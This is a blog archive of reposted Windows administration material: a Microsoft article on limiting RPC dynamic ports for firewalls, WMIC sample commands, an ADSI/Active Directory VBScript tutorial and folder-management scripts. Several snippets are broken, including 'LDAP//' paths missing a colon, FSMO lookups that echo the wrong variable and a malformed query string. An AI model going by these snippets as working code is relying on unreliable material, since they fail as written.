Revision : 14.3
This article was previously published under Q154596
SUMMARY
Remote Procedure Call (RPC) dynamic port allocation is used by remote administration applications such as Dynamic Host Configuration Protocol (DHCP) Manager, Windows Internet Name Service (WINS) Manager, and so on. RPC dynamic port allocation will instruct the RPC program to use a particular random port above 1024.

Customers using firewalls may want to control which ports RPC is using so that their firewall router can be configured to forward only these Transmission Control Protocol (TCP) ports.

Many RPC servers in Windows let you specify the server port. When you can specify a dedicated server port, you know what traffic flows between the hosts across the firewall, and you can define the that is traffic allowed much better. You can find a comprehensive list of Server ports that are used in Windows and major Microsoft products can be found in Microsoft Knowledge Base article 832017. For more information, click the following article number to view the article in the Microsoft Knowledge Base:
832017 (http://support.microsoft.com/kb/832017/) Service overview and network port requirements for the Windows Server system
The article also lists the RPC servers and which RPC servers can be configured to use custom server ports beyond the facilities that RPC offers. Use the method that is described in this article only if the RPC server does not offer a way to define the server port.

The following registry entries apply to Windows NT 4.0 and above. They do not apply to previous versions of Windows NT. Even though you can configure the port used by the client to communicate with the server, the client must be able to reach the server by its actual IP address. You cannot use DCOM through firewalls that do address translation (e.g. where a client connects to virtual address 198.252.145.1, which the firewall maps transparently to the server's actual address of, say, 192.100.81.101). This is because DCOM stores raw IP addresses in the interface marshaling packets and if the client cannot connect to the address specified in the packet, it will not work.

For more information, see the Microsoft white paper Using Distributed COM with Firewalls. To do this, visit the following Microsoft Web site:
http://msdn2.microsoft.com/en-us/library/ms809327.aspx (http://msdn2.microsoft.com/en-us/library/ms809327.aspx)

Back to the top
MORE INFORMATION
The values (and Internet key) discussed below do not appear in the registry; they must be added manually using the Registry Editor. Also, note that you must use Regedt32.exe instead of Regedit.exe to add the REG_MULTI_SZ value.

Important This section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you modify it. Then, you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, click the following article number to view the article in the Microsoft Knowledge Base:
322756 (http://support.microsoft.com/kb/322756/) How to back up and restore the registry in Windows

With Registry Editor, you can modify the following parameters for RPC. The RPC Port key values discussed below are all located in the following key in the registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Internet\ Key Data Type

Ports REG_MULTI_SZ
Specifies a set of IP port ranges consisting of either all the ports available from the Internet or all the ports not available from the Internet. Each string represents a single port or an inclusive set of ports. For example, a single port may be represented by 5984, and a set of ports may be represented by 5000-5100. If any entries are outside the range of 0 to 65535, or if any string cannot be interpreted, the RPC runtime treats the entire configuration as invalid.
PortsInternetAvailable REG_SZ Y or N (not case-sensitive)
If Y, the ports listed in the Ports key are all the Internet-available ports on that computer. If N, the ports listed in the Ports key are all those ports that are not Internet-available.
UseInternetPorts REG_SZ ) Y or N (not case-sensitive
Specifies the system default policy.
If Y, the processes using the default will be assigned ports from the set of Internet-available ports, as defined previously.
If N, the processes using the default will be assigned ports from the set of intranet-only ports.
Example:
1. Add the Internet key under: HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc
2. Under the Internet key, add the values "Ports" (MULTI_SZ), "PortsInternetAvailable" (REG_SZ), and "UseInternetPorts" (REG_SZ).

In this example ports 5000 through 5100 inclusive have been arbitrarily selected to help illustrate how the new registry key can be configured. For example, the new registry key appears as follows:
Ports: REG_MULTI_SZ: 5000-5100
PortsInternetAvailable: REG_SZ: Y
UseInternetPorts: REG_SZ: Y
3. Restart the server. All applications that use RPC dynamic port allocation use ports 5000 through 5100, inclusive. In most environments, a minimum of 100 ports should be opened, because several system services rely on these RPC ports to communicate with each other.
You should open up a range of ports above port 5000. Port numbers below 5000 may already be in use by other applications and could cause conflicts with your DCOM application(s). Furthermore, previous experience shows that a minimum of 100 ports should be opened, because several system services rely on these RPC ports to communicate with each other.

Note The minimum number of ports may differ from computer to computer and depends on the configuration of the computer.

Back to the top
For more information, click the following article numbers to view the articles in the Microsoft Knowledge Base:
167128 (http://support.microsoft.com/kb/167128/) Network ports used by remote helpdesk functions
179442 (http://support.microsoft.com/kb/179442/) How to configure a firewall for domains and trusts
263293 (http://support.microsoft.com/kb/263293/) Windows 2000 NAT does not translate Netlogon traffic
319553 (http://support.microsoft.com/kb/319553/) How to restrict FRS replication traffic to a specific static port
224196 (http://support.microsoft.com/kb/224196/) Restricting Active Directory replication traffic and client RPC traffic to a specific port
If you use Windows Server 2003, you can use the RPC Configuration Tool (RPCCfg.exe) from the Windows Server 2003 Resource Kit to complete the process that is described in this article. To obtain the RPC Configuration Tool, visit the following Microsoft Web site:
http://www.microsoft.com/downloads/details.aspx?FamilyID=0f9cde2f-8632-4da8-ae70-645e1ddaf369&DisplayLang=en (http://www.microsoft.com/downloads/details.aspx?FamilyID=0f9cde2f-8632-4da8-ae70-645e1ddaf369&DisplayLang=en)

Back to the top
APPLIES TO
• Microsoft Windows Server 2003, Standard Edition (32-bit x86)
• Microsoft Windows Server 2003, Enterprise Edition (32-bit x86)
• Microsoft Windows Server 2003, Datacenter Edition (32-bit x86)
• Microsoft Windows Server 2003, Enterprise Edition for Itanium-based Systems
• Microsoft Windows Server 2003, Datacenter Edition for Itanium-Based Systems
• Microsoft Windows 2000 Professional Edition
• Microsoft Windows 2000 Server
• Microsoft Windows 2000 Advanced Server
• Microsoft Windows 2000 Datacenter Server
• Microsoft Windows NT Server 4.0 Standard Edition

WMIC Samples

2008-09-25T21:22:00.000-07:00

WMIC Samples
url:http://blogs.technet.com/jhoward/archive/2005/02/23/378726.aspx

As promised, here are the sample WMIC commands I demonstrated in the Automating Windows Server 2003 session yesterday evening in Reading. Hope they are useful to you.

Update static IP address
wmic nicconfig where index=9 call enablestatic("192.168.16.4"), ("255.255.255.0")

Change network gateway
wmic nicconfig where index=9 call setgateways("192.168.16.4", "192.168.16.5"),(1,2)

Enable DHCP
wmic nicconfig where index=9 call enabledhcp

Service Management
wmic service where caption="DHCP Client" call changestartmode "Disabled"

Start an application
wmic process call create "calc.exe"

Terminate an application
wmic process where name="calc.exe" call terminate

Change process priority
wmic process where name="explorer.exe" call setpriority 64

Get list of process identifiers
wmic process where (Name='svchost.exe') get name,processid

Information about harddrives
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber

Information about os
wmic os get bootdevice, buildnumber, caption, freespaceinpagingfiles, installdate, name, systemdrive, windowsdirectory /format:htable > c:\osinfo.htm

Information about files
wmic path cim_datafile where "Path='\\windows\\system32\\wbem\\' and FileSize>1784088" > c:\wbemfiles.txt

Process list
wmic process get /format:htable > c:\process.htm

Retrieve list of warning and error events not from system or security logs
WMIC NTEVENT WHERE "EventType<3 AND LogFile != 'System' AND LogFile != 'Security'" GET LogFile, SourceName, EventType, Message, TimeGenerated /FORMAT:"htable.xsl":" datatype = number":" sortby = EventType" > c:\appevent.htm

Active Directory Service Interfaces (ADSI) Benefits

2008-09-23T21:10:00.000-07:00

url:http://www.activexperts.com/activmonitor/windowsmanagement/adsi/

Active Directory Service Interfaces (ADSI) Benefits

ADSI Basics
Active Directory Services Interface (ADSI) is a set of COM (Common Object Model) programming Interfaces. Like ODBC, ADSI provides common access to directories by adding a provider for each directory protocol type.
Windows 2000 contains providers for:

* WinNT – access to Windows NT 3.51 and Windows NT4;
* LDAP – LDAP directories including Windows 2000 Active Directory, Site Server 3.0, Microsoft Exchange and third party LDAP servers;
* NDS – Novell NDS.

Benefits of accessing directories with ADSI:

* Open Architecture – Any directory provider can implement an ADSI interface;
* Directory Service Independent – Applications are not bound to a vendor's proprietary directory service since it is using an API;
* Security – ADSI supports authentication.

ADSI Architecture
ADSI objects are COM objects, which represent objects in an underlying directory service. Objects can be container objects (like Folders) or Leaf objects (like Files). Each object has a unique ADSI path – a provider name followed by an object path. ADSI provides an abstract schema which describes the type of objects and attributes supported by each provider. Objects are read into cache when GetInfo or GetObject are called. Changes reside in cached memory on the client until a SetInfo is issued. SetInfo writes data back to the underlying directory store.

LDAP provider and serverless binding
The preferred method for connecting to an object is to use serverless binding; this means that the server is not explicitly provided; the default domain controller is the source of the LDAP requests. If the requested operations cannot be serviced in the local domain, a referral to the correct server is generated when possible, and the closest server is given.
A serverless path is of the form LDAP://object. To bind to the domain DNS object which is the root container of the domain naming context:

Set Odse = GetObject( "LDAP//DC=corp,DC=Microsoft,DC=com")

RootDse
The RootDse is a special LDAP object that exists on all LDAP v3 servers. With it you can write scripts that are independent of the domain or enterprise on whih they are run:

Set Odse = GetObject( "LDAP://RootDse" )

For example, to reference an object in the current domain you can read the value for DefaultNamingContext to determine the current domain:

' Get path to the configuration naming context.
Set RootDse = GetObject( "LDAP//RootDse" )
Path = "LDAP://" & RootDse.get( "DefaultNamingContext" )

Domain-based information such as users, groups, and computers resides in the domain naming context. Enterprise configuration information such as sites and subnets can be found in the Configuration Naming context. You can learn the path to naming contexts by examining ConfigurationNamingContext and SchemaNamingContext.

Non-windows 2000 clients
ADSI serverless binding is not avalable on Windows NT4 or Windows 98, so on these platforms you must always supply the name of an LDAP server for the connections:

Set Odse = GetObject( "LDAP//servername/RootDse" )

Using the Global Catalog
A global catalog (GC) server is a domain controller that contains a partial read-only replica of every object in every naming context. The replica is used to quickly search the enterprise for an object. The GC contains all objects from all naming contexts, but it is partial in that it contains only attributes designated for replication to the GC. The GC is accessed using port 3268 or by the GC provider as alias. In ADSI any reference to the GC is mapped to the LDAP provider on port 3268. Some of the common uses for searching the GC are:

* Finding user's address book information;
* Looking up members of a universal group;
* Mapping the User Principal Name to a specific User Account.

Reading an object
To read an object you must first use GetObject to bind to it:

Set objUser = GetObject( "LDAP://CN=wjohnson;CN=Users;DC=klm,DC=com" )

This fills the object cache in the client's memory with the object's attributes. You can access each attribute by it's name:

WScript.Echo objUser.givenName & " " & objUser.sn & " " & objUser.mail
Set objUser = Nothing

Updating an object
To update attributes on an existing object, you have to first bind to the object with GetObject, set each attribute's value (to update the values in the local object cache on the client), then issue a SetInfo to write the changes back to the directory. This example sets the mail address and the user's last name on user account:

Set objUser = GetObject( "LDAP://CN=wjohnson,CN=User,DC=klm,DC=com" )
objUser.mail = "wjohnson@klm.com"
objUser.sn = "wjohnson"
objUser.SetInfo
Set objUser = Nothing

Enumerating a container
To enumerate a container such as on OU, first bind to the OU and then use a loop to enumerate the container's object. To list all objects in the Users container:

Set ou = GetObject( "LDAP://CN=Users,DC=klm,DC=com" )
For each obj in ou
WScript.Echo obj.Name
Next

Searching
OLE DB provides a common way to query for information in a database-like way. The ADSI OLE DB provider allows you to use ActiveX Data Object (ADOs) to search the Active Directory. The provider is read-only, so if you need to modify an object after you search for it, use GetObject with the AdsPath
To search the Active Directory you must first create the ADO connection and command objects:

' list all objects in the domain naming context
Dim con, rs, Com
Set con = WScript.CreateObject( "ADODB.Connection" )
Set com = WScript.CreateObject( "ADODB.Command" )

Next, open the ADO provider:

' Open a connection object
con.Provider = "ADsDSObject"
con.Open "Active Directory Provider"

Then set the command object to use the current connection object, and build the query using either a simple SQL format or the LDAP search filter format (used in the example below). The query specifies the search's starting path and a filter for matching (the sample below looks for any type of object). Then list the attributes you want the query to return. Finally, specify the depth of the search: subtree for a deep search, base for a single object, or one level for searching a container.

Set Com.ActiveConnection = con
Com.CommandText = ";(objectClass=*);adspath;subtree"

' Set the preferences for Search

Com.Properties( "Page Size" ) = 512
Com.Properties( "TimeOut" ) = 30 ' seconds

When you execute the query, the results are retuned in a recordset. Loop through the recordset and print out the value, then move on to the next record.

While Not rs.EOF
WScript.Echo rs.Fields( "AdsPath").Value
Rs.MoveNext
Wend

Managing Domain Information

Extracting Computer Information
Network Administrators have always wanted an easy way to get a list of network workstations along with operating system and service pack information. You can now do this by using new attributes on Windows 2000 computer accounts to identify the computer's current status. The computer object is now automatically updated with information (from the netlogon service during secure channel setup) about the client's operating system, operating system version, and service pack level. You can identify unused or possibly inactive computer accounts; accounts that have never been used do not have the operating system and version attributes set. If the whenChanged attribute is more than a month old, the computer probably is not active on a network making periodic password changes. The whenChanged attribute is a non-replicated attribute which means it is calculated on each DC. The lastLogon attribute is not replicated between DCs; to determine the last logon time you have to examine it on all DCs.

Attrinbutes of interest:

* Name – Computer name
* dnsHostName – Full DNS hostname of the machine;
* UserAccountControl – Type of account: ADS_UF_WORKSTATION_TRUST_ACCOUNT, ADS_UF_SERVER_TRUST_ACCOUNT;
* operatingSystem – Windows NT, Windows 2000 Server, Windows 2000 Professional;
* operatingSystemVersion – Operating system version and build;
* operatingSystemServicePack – Operating system service pack numbe;r
* operatingSystemHotfix – List of hotfixes;
* whenCreated – When the object was created;
* whenChanged – When the object was modified.

Locating Computers Based on Computer Account Attributes:

Const ADS_SCOPE_SUBTREE = 2
Set objConnection = CreateObject("ADODB.Connection")
Set objCommand = CreateObject("ADODB.Command")
objConnection.Provider = "ADsDSOObject"
objConnection.Open "Active Directory Provider"
Set objCommand.ActiveConnection = objConnection
objCommand.CommandText = _
"SELECT Name, Location, operatingSystemVersion FROM " _
& "'LDAP://DC=fabrikam,DC=com' WHERE objectClass='computer' " _
& "and operatingSystemVersion = '5.0 (2195)'"
objCommand.Properties("Page Size") = 1000
objCommand.Properties("Timeout") = 30
objCommand.Properties("Searchscope") = ADS_SCOPE_SUBTREE
objCommand.Properties("Cache Results") = False
Set objRecordSet = objCommand.Execute
objRecordSet.MoveFirst
Do Until objRecordSet.EOF
Wscript.Echo "Computer Name: " & objRecordSet.Fields("Name").Value
Wscript.Echo "Location: " & objRecordSet.Fields("Location").Value
objRecordSet.MoveNext
Loop

Trust Relation Ships
When you want to document your configuration, it is useful to have a list of all domain trust relation ships, especially during migrations, when you usually have a mix of trusts between Windows 2000 domains. Windows NT account domains, and Windows NT 4.0 resource domains. Each trust relationship in a domain has a trusted domain object that resides in the System container in the Domain naming context:

* flatName – The NetBIOS name of the domain for this trust;
* trustDirection – The direction of the established trust relationship: 0=disabled; 1=inbound; 2=outbound; 3=both (trusted and trusting);
* trustPartner – A string representing the DNS-style name of Windows 2000 domains or the NetBIOS name of down-level trust domains;
* trustType – The type of trust relationship established to the domain: 1=downlevel trust; 2=Windows 2000 trust; 3=MIT; 4=DCE.

Creating User Accounts
When creating a new user account, you must set the CN (unique in the account's OU) and Samaccountname (unique in the domain) attributes. The userPrincipalName attribute (unique in the enterprise) is optional. To create a new user in the OU:

Dim salesOU as IADsContainer
Set salesOU = GetObject("LDAP://OU=Sales,DC=Fabrikam,DC=COM")
Set usr = salesOU.Create("user", "CN=Jay Adams")
usr.Put "sAMAccountName", "jayadams"
usr.Put "userPrincipalName", "jayadams@fabrikam.com"
usr.Put "title", "Marketing Manager"
usr.SetInfo

usr.SetPassword "seahorse"
usr.AccountDisabled = False
usr.SetInfo

Creating Groups
There are three scopes for groups:

* Universal;
* Global;
* Domain Local.

Groups are of these types:

* Security – To control access to resources, and to use them as e-mail distribution lists;
* Distribution – Only used for e-mail distribution lists.

Group type is required. Specify an integer that contains the flags that specify the group type and scope using these combinations:

* Global security – ADS_GROUP_TYPE_GLOBAL_GROUP | ADS_GROUP_TYPE_SECURITY_ENABLED;
* Domain local security – ADS_GROUP_TYPE_DOMAIN_LOCAL_GROUP | ADS_GROUP_TYPE_SECURITY_ENABLED;
* Universal security – ADS_GROUP_TYPE_UNIVERSAL_GROUP | ADS_GROUP_TYPE_SECURITY_ENABLED;
* Domain local distribution – ADS_GROUP_TYPE_DOMAIN_LOCAL_GROUP;
* Universal Distribution – ADS_GROUP_TYPE_DOMAIN_UNIVERSAL_GROUP.

The process of creating a group is similar to other objects. First bind to the OU which will contain the group. Next create the group object. Then set the group type, and samAccountName for down-level clients.

Set ou = GetObject( "LDAP://OU=DSys,DC=Northwind,DC=tld" )
Set grp = ou.Create( "group", "CN=Distributed System Admin" )

' Creating a domain local group
grp.Put "groupType", ADS_GROUP_TYPE_LOCAL Or ADS_GROUP_TYPE_SECURITY_ENABLED
grp.Put "samAccountName", "DSysAdmin"
grp.SetInfo

Use the add method to add members to a group using the path to the user's object.

' Adding a user to a group
grp.Add( "LDAP://CN=James Smith,OU=Marketing,OU=DSys,DC=Northwind,DC=tld" )

Managing Enterprise Configuration Information
Configuration information is global information shared among all domains in the enterprise and usually managed by the enterprise administrator.

Partitions
The partitions container's crossRef objects list the enterprise naming contexts – one for Configuration, one for Schema and one for each Domain. You can add objects to point to partitions on other LDAP servers that are not part of the enterprise, in which case you generate an LDAP referral to the proper partition when requesting an object from that portion of the namespace.

This script enumerates crossRef objects in the partitions container:

On Error Resume Next

msgbox "This script enumerates crossRef objects in the partitions container."

sPrefix = "LDAP://"

' Get distinguished name for config container and build ADsPath to partitions container.
Set root= GetObject(sPrefix & "rootDSE")
If (Err.Number <> 0) Then
BailOnFailure Err.Number, "on GetObject method for rootDSE"
End If
sConfigDN = root.Get("configurationNamingContext")
If (Err.Number <> 0) Then
BailOnFailure Err.Number, "on Get method"
End If
sContainerDN = "cn=Partitions," & sConfigDN

'''''''''''''''''''''''''''''''''''''''
' Bind to the container
'''''''''''''''''''''''''''''''''''''''
Set cont= GetObject(sPrefix & sContainerDN)
If (Err.Number <> 0) Then
BailOnFailure Err.Number, "on GetObject method for partitions container"
End If
'''''''''''''''''''''''''''''''''''''''
' Enumerate the container.
''''''''''''''''''''''''''''''''''''''
For Each obj In cont
strText = strText & "Name: " & obj.Get("name") & vbCrLf
values = obj.GetEx("objectClass")
For Each value In values
sValue = value
Next
strText = strText & " objectClass: " & sValue & vbCrLf
strText = strText & " DnsRoot: " & obj.Get("dnsRoot") & vbCrLf
strText = strText & " NCName: " & obj.Get("NCName") & vbCrLf
sTrustParent = obj.Get("trustParent")
If (Err.Number = 0) Then
strText = strText & " TrustParent: " & sTrustParent & vbCrLf
Else
Err.Clear
End If
sNetBIOSName = obj.Get("nETBIOSName")
If (Err.Number = 0) Then
strText = strText & " NETBIOSName: " & sNetBIOSName & vbCrLf
Else
Err.Clear
End If
Next

show_items strText, "Display crossRef"

'''''''''''''''''''''''''''''''''''''''
' Display subroutines
'''''''''''''''''''''''''''''''''''''''
Sub show_items(strText, strName)
MsgBox strText, vbInformation, "Create CrossRef"
End Sub

Sub BailOnFailure(ErrNum, ErrText) strText = "Error 0x" & Hex(ErrNum) & " " & ErrText
MsgBox strText, vbInformation, "ADSI Error"
WScript.Quit
End Sub

Listing Domain Controllers
Each domain controller in the enterprise is represented by several objects:

* A computer object residing in the Domain renaming context (the computer account for the machine);
* a nTDSDSA object (NTDS settings) residing in the Configuration naming context. NTDS settings is a container that represents an instance of the directory service; it holds the DC's inbound replication connections. If you accidentally remove a NTDS Settings, the DC owning the object will resurrect the deleted object;
* A Servers object residing under the object in the DC's site.

To get a list of all enterprise DCs, issue a query with a base path of the site's container that searches for object category nTDSDSA. Some attributes of interest:

* AdsPath - Use the full path to the object to find the parent object, which contains the DNS hostname of the DCs;
* HasMasterNCs - A multi-valued list of all the writable naming contexts. For this release of Windows 2000, these are Schema, Configuration and Domain;
* Options - Bit 1 indicates if this DC is also GC.

Listing domain controllers:

' Get the Configuration Naming Context
Set oRootDSE = GetObject("LDAP://RootDSE")
strConfigNC = oRootDSE.Get("configurationNamingContext")

' Set up the oConnectionection
set oConnection = CreateObject("ADODB.Connection")
oConnection.Provider = "ADsDSOObject"
oConnection.Open "ADs Provider"

' Build the query
strQuery = "">;(objectClass=nTDSDSA);ADsPath;subtree"

set oCmd = CreateObject("ADODB.Command")
oCmd.ActiveConnection = oConnection
oCmd.CommandText = strQuery
Set oRecordset = oCmd.Execute

' Iterate through the results
If oRecordset.Eof and oRecordSet.Bof Then
WScript.Echo "No Domain Controllers were found"
Else
While Not oRecordset.EOF
Set oParent = GetObject(GetObject(oRecordset.Fields("ADsPath")).Parent)
' Output the name of the server
WScript.Echo "Server: " & oParent.cn & " dNSHostName: " & oParent.dNSHostName
oRecordset.MoveNext
Wend
End if

FSMO
Flexible Single-Master Operations (FSMO) implements operations (there are only a few) that must be handled in a single master replication model. There are five FSMO roles, two per enterprise and three per domain, and you can use scripting to find out which DCs hold which FSMO roles.

Schema Master
The Schema Master is unique in the entire enterprise; it alone can create new classes or attributes, after which it replicates updates to all domains in the forest. To identify it, read the value of fsmoRoleOwner attribute on the Schema container found under the Configuration container. Schema and Configuration naming contexts are enterprise wide and reside on all domain controllers.

Set objRootDse = GetObject( "LDAP://RootDse" )
Set objSchema = GetObject( "LDAP://" & objRootDse.get( "SchemaNamingContext" ))
WScript.Echo objSchema.fsmoRoleOwner

Domain Naming Master
The Domain Naming Master is unique in the enterprise; it manages the addition and removal of domains into the forest. To identify it, read the partitions container object and examine its fsmoRoleOwner attribute:

Set objRootDse = GetObject( "LDAP://RootDse" )
Set objDomains = GetObject( "LDAP://CN=Partitions," & _
objRootDse.Get( "ConfigurationNamingContext" ))
WScript.Echo objDomains.fsmoRoleOwner

PDC Emulator
The PDC Emulator is a per-domain role. To identify it, read the value of the fsmoRoleOwner attribute on the DomainDNS object:

Set objRootDse = GetObject( "LDAP://RootDse" )
Set objPDC = GetObject( "LDAP://" & objRootDse.Get( "DefaultNamingContext" ))
WScript.Echo objDomains.fsmoRoleOwner

RID Master
The RID Master is a per-domain role. It allocates RID blocks for all DCs in a domain that are used for SIDs in security principals such as users and groups. To identify it, read the value of the fsmoRoleOwner attribute on the RIDManager object of name CN="Rid Manager$" found in the domain's System Container:

Set objRootDse = GetObject( "LDAP://RootDse" )
Set objRID = GetObject( "LDAP://CN=Rid Manager$,CN=System," & _
objRootDse.Get( "DefaultNamingContext" ))
WScript.Echo objDomains.fsmoRoleOwner

Infrastructure Master
The Infrastructure Master is a per-domain role. To identify it, read the value of the fsmoRoleOwner attribute on the InfrastructureUpdate object for the domain:

Set objRootDse = GetObject( "LDAP://RootDse" )
Set objInfra = GetObject( "LDAP://CN=Infrastructure," & _
objRootDse.Get( "DefaultNamingContext" ))
WScript.Echo objDomains.fsmoRoleOwner

ADSI Samples
Click here to view ADSI samples.

Scripts to manage Folders activexperts.com

2008-09-23T20:44:00.000-07:00

url: http://www.activexperts.com/activmonitor/windowsmanagement/adminscripts/filesfolders/folders/#CreateNewFolders.htm

Download ActiveXperts Network Monitor 7.0 (6239 KB - .exe file)
Download Manual (653 KB - .pdf file)
ActiveXperts.com > ActiveXperts Network Monitor > WindowsManagement > Scripts > Files and Folders > Folders
Scripts to manage Folders
Changing Folder Attributes
Compressing Folders
Copying a Folder
Copying Folders Using WMI
Copying Folders Using the Shell Object
Creating a Folder
Creating New Folders
Deleting a Folder
Deleting Folders
Enumerating All the Folders on a Computer
Enumerating Folder Attributes
Enumerating Folder Properties
Enumerating Folders Using Dates
Enumerating a Specific Set of Folders
Enumerating Subfolders in a Folder
Finding Folders by Date
Identifying Shell Object Verbs
Moving a Folder
Moving Folders Using the Shell Object
Moving Folders Using WMI
Renaming a Folder
Renaming Folders
Retrieving Folder Properties
Uncompressing Folders
Using the Browse for Folder Dialog Box
Using Recursion to Enumerate Subfolders
Using Wildcards in a Folder Query
Verifying that a Folder Exists

Changing Folder Attributes

Demonstration script that uses the FileSystemObject to check if a folder is hidden and, if it is not, hides it. Script must be run on the local computer. Script must be run on the local computer.

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSO.GetFolder("C:\FSO")
If objFolder.Attributes = objFolder.Attributes AND 2 Then
objFolder.Attributes = objFolder.Attributes XOR 2
End If

Compressing Folders

Compresses the folder C:\Scripts.

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colFolders = objWMIService.ExecQuery _
("Select * from Win32_Directory where name = 'c:\\Scripts'")
For Each objFolder in colFolders
errResults = objFolder.Compress
Wscript.Echo errResults
Next

Copying a Folder

Demonstration script that uses the FileSystemObject to copy a folder to a new location. Script must be run on the local computer.

Const OverWriteFiles = True
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.CopyFolder "C:\Scripts" , "C:\FSO" , OverWriteFiles

Copying Folders Using WMI

Uses WMI to copy the folder C:\Scripts to D:\Archive.

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colFolders = objWMIService.ExecQuery( _
"Select * from Win32_Directory where Name = 'c:\\Scripts'")
For Each objFolder in colFolders
errResults = objFolder.Copy("D:\Archive")
Wscript.Echo errResults
Next

Copying Folders Using the Shell Object

Uses the Shell object to copy the folder C:\Scripts to D:\Archives. Displays the Copying Files progress dialog as the folder is being copied.

Const FOF_CREATEPROGRESSDLG = &H0&
ParentFolder = "D:\Archive"
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.NameSpace(ParentFolder)
objFolder.CopyHere "C:\Scripts", FOF_CREATEPROGRESSDLG

Creating a Folder

Demonstration script that uses the FileSystemObject to create a folder. Script must be run on the local computer.

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSO.CreateFolder("C:\FSO")

Creating New Folders

Uses the Shell object to create a new folder named C:\Archive.

ParentFolder = "C:\"
set objShell = CreateObject("Shell.Application")
set objFolder = objShell.NameSpace(ParentFolder)
objFolder.NewFolder "Archive"

Deleting a Folder

Demonstration script that uses the FileSystemObject to delete a folder. Script must be run on the local computer.

Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFolder("C:\FSO")

Deleting Folders

Deletes the folder C:\Scripts.

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colFolders = objWMIService.ExecQuery _
("Select * from Win32_Directory where Name = 'c:\\Scripts'")
For Each objFolder in colFolders
errResults = objFolder.Delete
Wscript.Echo errResults
Next

Enumerating All the Folders on a Computer

Returns a list of all the folders on a computer. This can take 15 minutes or more to complete, depending on the number of folders on the computer.

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colFolders = objWMIService.ExecQuery("Select * from Win32_Directory")
For Each objFolder in colFolders
Wscript.Echo objFolder.Name
Next

Enumerating Folder Attributes

Demonstration script that uses the FileSystemObject to enumerate the attributes of a folder. Script must be run on the local computer.

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSO.GetFolder("C:\FSO")
If objFolder.Attributes AND 2 Then
Wscript.Echo "Hidden folder."
End If
If objFolder.Attributes AND 4 Then
Wscript.Echo "System folder."
End If
If objFolder.Attributes AND 16 Then
Wscript.Echo "Folder."
End If
If objFolder.Attributes AND 32 Then
Wscript.Echo "Archive bit set."
End If
If objFolder.Attributes AND 2048 Then
Wscript.Echo "Compressed folder."
End If

Enumerating Folder Properties

Demonstration script that uses the FileSystemObject to enumerate the properties of a folder. Script must be run on the local computer.

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSO.GetFolder("C:\Scripts")
Wscript.Echo "Date created: " & objFolder.DateCreated
Wscript.Echo "Date last accessed: " & objFolder.DateLastAccessed
Wscript.Echo "Date last modified: " & objFolder.DateLastModified
Wscript.Echo "Drive: " & objFolder.Drive
Wscript.Echo "Is root folder: " & objFolder.IsRootFolder
Wscript.Echo "Name: " & objFolder.Name
Wscript.Echo "Parent folder: " & objFolder.ParentFolder
Wscript.Echo "Path: " & objFolder.Path
Wscript.Echo "Short name: " & objFolder.ShortName
Wscript.Echo "Short path: " & objFolder.ShortPath
Wscript.Echo "Size: " & objFolder.Size
Wscript.Echo "Type: " & objFolder.Type

Enumerating Folders Using Dates

Lists all the folders on a computer that were created after 3/1/2002.

Const LOCAL_TIME = True
Set dtmTargetDate = CreateObject("WbemScripting.SWbemDateTime")
Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime")
dtmTargetDate.SetVarDate "3/1/2002", LOCAL_TIME
strComputer = "."
Set objWMIService = GetObject _
("winmgmts:" & "!\\" & strComputer & "\root\cimv2")
Set colFolders = objWMIService.ExecQuery _
("Select * from Win32_Directory Where " _
& "CreationDate > '" & dtmTargetDate & "'")
For each objFolder in colFolders
dtmConvertedDate.Value = objFolder.CreationDate
Wscript.Echo objFolder.Name & VbTab & _
dtmConvertedDate.GetVarDate(LOCAL_TIME)
Next

Enumerating a Specific Set of Folders

Returns a list of all the hidden folders on a computer.

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colFiles = objWMIService.ExecQuery _
("Select * from Win32_Directory Where Hidden = True")
For Each objFile in colFiles
Wscript.Echo objFile.Name
Next

Enumerating Subfolders in a Folder

Demonstration script that uses the FileSystemObject to return the folder name and size for all the subfolders in a folder. Script must be run on the local computer.

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSO.GetFolder("C:\FSO")
Set colSubfolders = objFolder.Subfolders
For Each objSubfolder in colSubfolders
Wscript.Echo objSubfolder.Name, objSubfolder.Size
Next

Finding Folders by Date

Finds all the folders created after March 1, 2002. To modify this script, you must modify the following items in the value assigned to the variable dtmTargetDate: 2002 -- Change this to the target year (for example, 1999). 03 -- Change this to the target month (01 for January, 02 for February … 12 for December). 01 -- Change this to the target day (01 for the first day of the month, 02 for the second, etc.). -420 -- To assure the correct results, change this to the offset between your time zone and Greenwich Mean Time. If you do not know the offset, use the script Determining Time Zone Offset from Greenwich Mean Time.

On Error Resume Next
dtmTargetDate = "20020301000000.000000-420"
strComputer = "."

Set objWMIService = GetObject _
("winmgmts:" & "!\\" & strComputer & "\root\cimv2")
Set colFolders = objWMIService.ExecQuery _
("Select * from Win32_Directory Where CreationDate > '" & _
dtmtargetDate & "'")

For Each objFolder in colFolders
Wscript.Echo objFolder.Name
Next

Identifying Shell Object Verbs

Returns a list of Shell object verbs (context menu items) for the Recycle Bin.

Const RECYCLE_BIN = &Ha&
